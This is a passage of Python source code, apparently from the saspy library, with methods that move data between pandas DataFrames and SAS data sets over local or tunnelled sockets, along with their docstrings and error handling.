keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set
LF - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\x01'
CR - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\x02'
colsep - the column seperator character used for streaming the delimmited data to SAS defaults to '\x03'
datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
outfmts - dict with column names and SAS formats to assign to the new SAS data set
labels - dict with column names and SAS Labels to assign to the new SAS data set
outdsopts - a dictionary containing output data set options for the table being created
encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set
"""
input = ""
xlate = ""
card = ""
format = ""
length = ""
label = ""
dts = []
ncols = len(df.columns)
lf = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
cr = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "
dts_upper = {k.upper():v for k,v in datetimes.items()}
dts_keys = dts_upper.keys()
fmt_upper = {k.upper():v for k,v in outfmts.items()}
fmt_keys = fmt_upper.keys()
lab_upper = {k.upper():v for k,v in labels.items()}
lab_keys = lab_upper.keys()
if encode_errors is None:
encode_errors = 'fail'
if type(char_lengths) is not dict or len(char_lengths) < ncols:
charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
else:
charlens = char_lengths
if charlens is None:
return -1
chr_upper = {k.upper():v for k,v in charlens.items()}
if type(df.index) != pd.RangeIndex:
warnings.warn("Note that Indexes are not transferred over as columns. Only actual coulmns are transferred")
for name in df.columns:
colname = str(name).replace("'", "''")
col_up = str(name).upper()
input += "'"+colname+"'n "
if col_up in lab_keys:
label += "label '"+colname+"'n ="+lab_upper[col_up]+";\n"
if col_up in fmt_keys:
format += "'"+colname+"'n "+fmt_upper[col_up]+" "
if df.dtypes[name].kind in ('O','S','U','V'):
try:
length += " '"+colname+"'n $"+str(chr_upper[col_up])
except KeyError as e:
logger.error("Dictionary provided as char_lengths is missing column: "+colname)
raise e
if keep_outer_quotes:
input += "~ "
dts.append('C')
if embedded_newlines:
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
else:
if df.dtypes[name].kind in ('M'):
length += " '"+colname+"'n 8"
input += ":B8601DT26.6 "
if col_up not in dts_keys:
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601DT26.6 "
else:
if dts_upper[col_up].lower() == 'date':
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601DA. "
xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
else:
if dts_upper[col_up].lower() == 'time':
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601TM. "
xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
else:
logger.warning("invalid value for datetimes for column "+colname+". Using default.")
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601DT26.6 "
dts.append('D')
else:
length += " '"+colname+"'n 8"
if df.dtypes[name] == 'bool':
dts.append('B')
else:
dts.append('N')
port = kwargs.get('port', 0)
if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
# we are using a rtunnel; default to that port
server = True
port = self.sascfg.rtunnel
host = 'localhost'
code = """filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=V termstr=LF;\n"""
else:
server = False
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError as e:
raise e
code = """filename sock socket '"""+host+""":"""+str(port)+"""' recfm=V termstr=LF;\n"""
code += "data "
if len(libref):
code += libref+"."
code += "'"+table.strip().replace("'", "''")+"'n"
if len(outdsopts):
code += '('
for key in outdsopts:
code += key+'='+str(outdsopts[key]) + ' '
code += ");\n"
else:
code += ";\n"
if len(length):
code += "length"+length+";\n"
if len(format):
code += "format "+format+";\n"
code += label
code += "infile sock nbyte=nb delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
code += "else do;\n input "+input+";\n"+xlate+";\nend;\nrun;\nfilename sock;\n"
if not server:
sock.listen(1)
self._asubmit(code, "text")
if server:
sleep(1)
sock = socks.socket()
sock.connect((host, port))
ssock = sock
if not server:
if sel.select([sock],[],[],10)[0] == []:
logger.error("error occured in SAS during data transfer. Check the LOG for issues.")
sock.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in upload.\n"+ll['LOG']}
newsock = (0,0)
try:
newsock = sock.accept()
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
logger.error("error occured in SAS during data transfer. Check the LOG for issues.")
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ssock = newsock[0]
logf = b''
first = True
fail = False
blksz = int(kwargs.get('blocksize', 32767))
row_num = 0
code = ""
for row in df.itertuples(index=False):
row_num += 1
card = ""
for col in range(ncols):
var = str(row[col])
if dts[col] == 'N' and var == 'nan':
var = '.'
elif dts[col] == 'C':
if var == 'nan' or len(var) == 0:
var = ' '
else:
var = var.replace(colsep, colrep)
elif dts[col] == 'B':
var = str(int(row[col]))
elif dts[col] == 'D':
if var in ['nan', 'NaT', 'NaN']:
var = '.'
else:
var = str(row[col].to_datetime64())[:26]
card += var
if col < (ncols-1):
card += colsep
if embedded_newlines:
card = card.replace(LF, colrep).replace(CR, colrep)
card = card.replace('\n', LF).replace('\r', CR)
code += card+"\n"
if len(code) > blksz:
first = False
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
ll = self.submit("", 'text')
logger.error("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
logger.error("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
sent = 0
send = len(code)
blen = send
while send:
try:
sent = 0
sent = ssock.send(code[blen-send:blen])
except (BlockingIOError):
pass
except (OSError) as e:
if fail:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
logger.error("Failed connecting to server socket. Check the SASLOG to see the error")
ll = self.submit("", 'text')
return row_num
fail = True
if server:
sock.close()
sock = socks.socket()
sock.connect((host, port))
ssock = sock
sleep(1)
pass
send -= sent
code = ""
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if len(code):
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
logger.error("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
logger.error("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
sent = 0
send = len(code)
blen = send
while send:
try:
sent = 0
sent = ssock.send(code[blen-send:blen])
except (BlockingIOError):
pass
except (OSError) as e:
if not first:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
logger.error("Failed connecting to server socket. Check the SASLOG to see the error")
ll = self.submit("", 'text')
return row_num
first = False
if server:
sock.close()
sock = socks.socket()
sock.connect((host, port))
ssock = sock
sleep(1)
pass
send -= sent
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return None
def dataframe2sasdataORIG(self, df: '<Pandas Data Frame object>', table: str ='a',
libref: str ="", keep_outer_quotes: bool=False,
embedded_newlines: bool=True,
LF: str = '\x01', CR: str = '\x02',
colsep: str = '\x03', colrep: str = ' ',
datetimes: dict={}, outfmts: dict={}, labels: dict={},
outdsopts: dict={}, encode_errors = None, char_lengths = None,
**kwargs):
"""
This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
df - Pandas Data Frame to import to a SAS Data Set
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set
LF - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\x01'
CR - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\x02'
colsep - the column seperator character used for streaming the delimmited data to SAS defaults to '\x03'
datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
outfmts - dict with column names and SAS formats to assign to the new SAS data set
labels - dict with column names and SAS Labels to assign to the new SAS data set
outdsopts - a dictionary containing output data set options for the table being created
encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set
"""
input = ""
xlate = ""
card = ""
format = ""
length = ""
label = ""
dts = []
ncols = len(df.columns)
lf = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
cr = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "
dtkeys = datetimes.keys()
fmtkeys = outfmts.keys()
labkeys = labels.keys()
if encode_errors is None:
encode_errors = 'fail'
bpc = self._sb.pyenc[0]
if char_lengths and str(char_lengths).strip() in ['1','2','3','4']:
bpc = int(char_lengths)
if char_lengths and str(char_lengths) == 'exact':
CnotB = False
else:
CnotB = bpc == 1
if type(char_lengths) is not dict:
charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
else:
charlens = char_lengths
if charlens is None:
return -1
charlens = {k.upper():v for k,v in charlens.items()}
for name in df.columns:
colname = str(name).replace("'", "''")
input += "'"+colname+"'n "
if colname in labkeys:
label += "label '"+colname+"'n ="+labels[colname]+";\n"
if df.dtypes[name].kind in ('O','S','U','V'):
try:
length += " '"+colname+"'n $"+str(charlens[colname.upper()])
except KeyError as e:
logger.error("Dictionary provided as char_lengths is missing column: "+colname)
raise e
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if keep_outer_quotes:
input += "~ "
dts.append('C')
if embedded_newlines:
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
else:
if df.dtypes[name].kind in ('M'):
length += " '"+colname+"'n 8"
input += ":B8601DT26.6 "
if colname not in dtkeys:
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
else:
if datetimes[colname].lower() == 'date':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DA. "
xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
else:
if datetimes[colname].lower() == 'time':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601TM. "
xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
else:
logger.warning("invalid value for datetimes for column "+colname+". Using default.")
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
dts.append('D')
else:
length += " '"+colname+"'n 8"
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if df.dtypes[name] == 'bool':
dts.append('B')
else:
dts.append('N')
code = "data "
if len(libref):
code += libref+"."
code += "'"+table.strip().replace("'", "''")+"'n"
if len(outdsopts):
code += '('
for key in outdsopts:
code += key+'='+str(outdsopts[key]) + ' '
code += ");\n"
else:
code += ";\n"
if len(length):
code += "length"+length+";\n"
if len(format):
code += "format "+format+";\n"
code += label
code += "infile datalines delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
code += "else do;\n input "+input+";\n"+xlate+";\nend;\ndatalines4;"
self._asubmit(code, "text")
logf = b''
blksz = int(kwargs.get('blocksize', 32767))
row_num = 0
code = ""
for row in df.itertuples(index=False):
row_num += 1
card = ""
for col in range(ncols):
var = str(row[col])
if dts[col] == 'N' and var == 'nan':
var = '.'
elif dts[col] == 'C':
if var == 'nan' or len(var) == 0:
var = ' '
else:
var = var.replace(colsep, colrep)
elif dts[col] == 'B':
var = str(int(row[col]))
elif dts[col] == 'D':
if var in ['nan', 'NaT', 'NaN']:
var = '.'
else:
var = str(row[col].to_datetime64())[:26]
card += var
if col < (ncols-1):
card += colsep
if embedded_newlines:
card = card.replace(LF, colrep).replace(CR, colrep)
card = card.replace('\n', LF).replace('\r', CR)
code += card+"\n"
if len(code) > blksz:
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
logger.error("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
logger.error("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
#self.stdin.write(code+b'\n')
os.write(self.pin, code+b'\n')
self.stdin.flush()
code = ""
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if len(code):
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
logger.error("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
logger.error("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
#self.stdin.write(code+b'\n')
os.write(self.pin, code+b'\n')
self.stdin.flush()
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
return None
def sasdata2dataframe(self, table: str, libref: str ='', dsopts: dict = None,
rowsep: str = '\x01', colsep: str = '\x02',
rowrep: str = ' ', colrep: str = ' ',
port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
rowsep - the row seperator character to use; defaults to '\x01'
colsep - the column seperator character to use; defaults to '\x02'
rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '
colrep - the char to convert to for any embedded colsep chars, defaults to ' '
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
"""
dsopts = dsopts if dsopts is not None else {}
method = kwargs.pop('method', None)
if method and method.lower() == 'csv':
return self.sasdata2dataframeCSV(table, libref, dsopts, port=port, wait=wait, **kwargs)
#elif method and method.lower() == 'disk':
else:
return self.sasdata2dataframeDISK(table, libref, dsopts, rowsep, colsep,
rowrep, colrep, port=port, wait=wait, **kwargs)
def sasdata2dataframeCSV(self, table: str, libref: str ='', dsopts: dict = None, opts: dict = None,
port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
dsopts - data set options for the input SAS Data Set
opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)
tempfile - DEPRECATED
tempkeep - DEPRECATED
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
These two options are for advanced usage. They override how saspy imports data. For more info
see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques
dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=
"""
tmp = kwargs.pop('tempfile', None)
tmp = kwargs.pop('tempkeep', None)
dsopts = dsopts if dsopts is not None else {}
opts = opts if opts is not None else {}
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if libref:
tabname = libref+".'"+table.strip().replace("'", "''")+"'n "
else:
tabname = "'"+table.strip().replace("'", "''")+"'n "
code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
code += "put lr lrecl; put vn nvars; put vl;\n"
code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
code += "put vt;\n"
code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
code += "run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("LRECL= ")
l2 = l2[2].partition("\n")
lrecl = int(l2[0])
l2 = l2[2].partition("VARNUMS= ")
l2 = l2[2].partition("\n")
nvars = int(l2[0])
l2 = l2[2].partition("\n")
varlist = l2[2].split("\n", nvars)
del varlist[nvars]
dvarlist = list(varlist)
for i in range(len(varlist)):
varlist[i] = varlist[i].replace("'", "''")
l2 = l2[2].partition("VARTYPE=")
l2 = l2[2].partition("\n")
vartype = l2[2].split("\n", nvars)
del vartype[nvars]
topts = dict(dsopts)
topts.pop('firstobs', None)
topts.pop('obs', None)
code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
code += "data work._n_u_l_l_;output;run;\n"
code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
for i in range(nvars):
code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("FMT_CATS=")
l2 = l2[2].partition("\n")
varcat = l2[2].split("\n", nvars)
del varcat[nvars]
try:
sock = socks.socket()
if not self.sascfg.ssh or self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
logger.error('Error try to open a socket in the sasdata2dataframe method. Call failed.')
return None
if self.sascfg.ssh and not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
code = "filename sock socket '"+host+":"+str(port)+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v encoding='utf-8';\n"
code += "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";\nformat "
idx_col = kwargs.pop('index_col', False)
eng = kwargs.pop('engine', 'c')
my_fmts = kwargs.pop('my_fmts', False)
k_dts = kwargs.pop('dtype', None)
if k_dts is None and my_fmts:
logger.warning("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
my_fmts = False
if not my_fmts:
for i in range(nvars):
if vartype[i] == 'N':
code += "'"+varlist[i]+"'n "
if varcat[i] in self._sb.sas_date_fmts:
code += 'E8601DA10. '
else:
if varcat[i] in self._sb.sas_time_fmts:
code += 'E8601TM15.6 '
else:
if varcat[i] in self._sb.sas_datetime_fmts:
code += 'E8601DT26.6 '
else:
code += 'best32. '
code += ";\n run;\n"
ll = self.submit(code, "text")
if k_dts is None:
dts = {}
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
dts[dvarlist[i]] = 'float'
else:
dts[dvarlist[i]] = 'str'
else:
dts[dvarlist[i]] = 'str'
else:
dts = k_dts
code = ''
code = "proc export data=work.sasdata2dataframe outfile=sock dbms=csv replace;\n"
code += self._sb._expopts(opts)+" run;\n"
code += "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
sock.listen(1)
self._asubmit(code, 'text')
if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
logger.error("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
sock.close()
ll = self.submit("", 'text')
return ll['LOG']
newsock = (0,0)
try:
newsock = sock.accept()
sockout = _read_sock(newsock=newsock, rowsep=b'\n')
df = pd.read_csv(sockout, index_col=idx_col, encoding='utf8', engine=eng, dtype=dts, **kwargs)
except (KeyboardInterrupt, Exception) as e:
logger.error("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return str(e)+"\n\n"+ll['LOG']
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
ll = self.submit("", 'text')
if k_dts is None: # don't override these if user provided their own dtypes
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
df[dvarlist[i]] = pd.to_datetime(df[dvarlist[i]], errors='coerce')
return df
def sasdata2dataframeDISK(self, table: str, libref: str ='', dsopts: dict = None,
rowsep: str = '\x01', colsep: str = '\x02',
rowrep: str = ' ', colrep: str = ' ', port: int=0,
wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
dsopts - data set options for the input SAS Data Set
rowsep - the row seperator character to use; defaults to '\x01'
colsep - the column seperator character to use; defaults to '\x02'
rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '
colrep - the char to convert to for any embedded colsep chars, defaults to ' '
tempfile - DEPRECATED
tempkeep - DEPRECATED
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
These two options are for advanced usage. They override how saspy imports data. For more info
see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques
dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=
"""
tmp = kwargs.pop('tempfile', None)
tmp = kwargs.pop('tempkeep', None)
dsopts = dsopts if dsopts is not None else {}
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if libref:
tabname = libref+".'"+table.strip().replace("'", "''")+"'n "
else:
tabname = "'"+table.strip().replace("'", "''")+"'n "
code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
code += "put lr lrecl; put vn nvars; put vl;\n"
code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
code += "put vt;\n"
code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
code += "run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("LRECL= ")
l2 = l2[2].partition("\n")
lrecl = int(l2[0])
l2 = l2[2].partition("VARNUMS= ")
l2 = l2[2].partition("\n")
nvars = int(l2[0])
l2 = l2[2].partition("\n")
varlist = l2[2].split("\n", nvars)
del varlist[nvars]
dvarlist = list(varlist)
for i in range(len(varlist)):
varlist[i] = varlist[i].replace("'", "''")
l2 = l2[2].partition("VARTYPE=")
l2 = l2[2].partition("\n")
vartype = l2[2].split("\n", nvars)
del vartype[nvars]
topts = dict(dsopts)
topts.pop('firstobs', None)
topts.pop('obs', None)
code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
code += "data work._n_u_l_l_;output;run;\n"
code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
for i in range(nvars):
code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("FMT_CATS=")
l2 = l2[2].partition("\n")
varcat = l2[2].split("\n", nvars)
del varcat[nvars]
try:
sock = socks.socket()
if not self.sascfg.ssh or self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
logger.error('Error try to open a socket in the sasdata2dataframe method. Call failed.')
return None
if self.sascfg.ssh and not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
code = "filename sock socket '"+host+":"+str(port)+"' recfm=s encoding='utf-8';\n"
rdelim = "'"+'%02x' % ord(rowsep.encode(self.sascfg.encoding))+"'x"
cdelim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x"
idx_col = kwargs.pop('index_col', False)
eng = kwargs.pop('engine', 'c')
my_fmts = kwargs.pop('my_fmts', False)
k_dts = kwargs.pop('dtype', None)
if k_dts is None and my_fmts:
logger.warning("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
my_fmts = False
code += "data _null_; set "+tabname+self._sb._dsopts(dsopts)+";\n"
if not my_fmts:
for i in range(nvars):
if vartype[i] == 'N':
code += "format '"+varlist[i]+"'n "
if varcat[i] in self._sb.sas_date_fmts:
code += 'E8601DA10.'
else:
if varcat[i] in self._sb.sas_time_fmts:
code += 'E8601TM15.6'
else:
if varcat[i] in self._sb.sas_datetime_fmts:
code += 'E8601DT26.6'
else:
code += 'best32.'
code += '; '
if i % 10 == 9:
code +='\n'
miss = {}
code += "\nfile sock dlm="+cdelim+";\n"
for i in range(nvars):
if vartype[i] != 'N':
code += "'"+varlist[i]+"'n = translate('"
code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
'%02x%02x' % \
(ord(rowrep.encode(self.sascfg.encoding)), \
ord(colrep.encode(self.sascfg.encoding))),
'%02x%02x' % \
(ord(rowsep.encode(self.sascfg.encoding)), \
ord(colsep.encode(self.sascfg.encoding))))
miss[dvarlist[i]] = ' '
else:
code += "if missing('"+varlist[i]+"'n) then '"+varlist[i]+"'n = .; "
miss[dvarlist[i]] = '.'
if i % 10 == 9:
code +='\n'
code += "\nput "
for i in range(nvars):
code += " '"+varlist[i]+"'n "
if i % 10 == 9:
code +='\n'
code += rdelim+";\nrun;"
if k_dts is None:
dts = {}
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
dts[dvarlist[i]] = 'float'
else:
dts[dvarlist[i]] = 'str'
else:
dts[dvarlist[i]] = 'str'
else:
dts = k_dts
quoting = kwargs.pop('quoting', 3)
sock.listen(1)
self._asubmit(code, 'text')
if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
logger.error("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
sock.close()
ll = self.submit("", 'text')
return ll['LOG']
newsock = (0,0)
try:
newsock = sock.accept()
sockout = _read_sock(newsock=newsock, rowsep=rowsep.encode())
df = pd.read_csv(sockout, index_col=idx_col, engine=eng, header=None, names=dvarlist,
sep=colsep, lineterminator=rowsep, dtype=dts, na_values=miss,
encoding='utf8', quoting=quoting, **kwargs)
except (KeyboardInterrupt, Exception) as e:
logger.error(e)
logger.error("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return str(e)+"\n\n"+ll['LOG']
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
ll = self.submit("", 'text')
if k_dts is None: # don't override these if user provided their own dtypes
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
df[dvarlist[i]] = pd.to_datetime(df[dvarlist[i]], errors='coerce')
return df
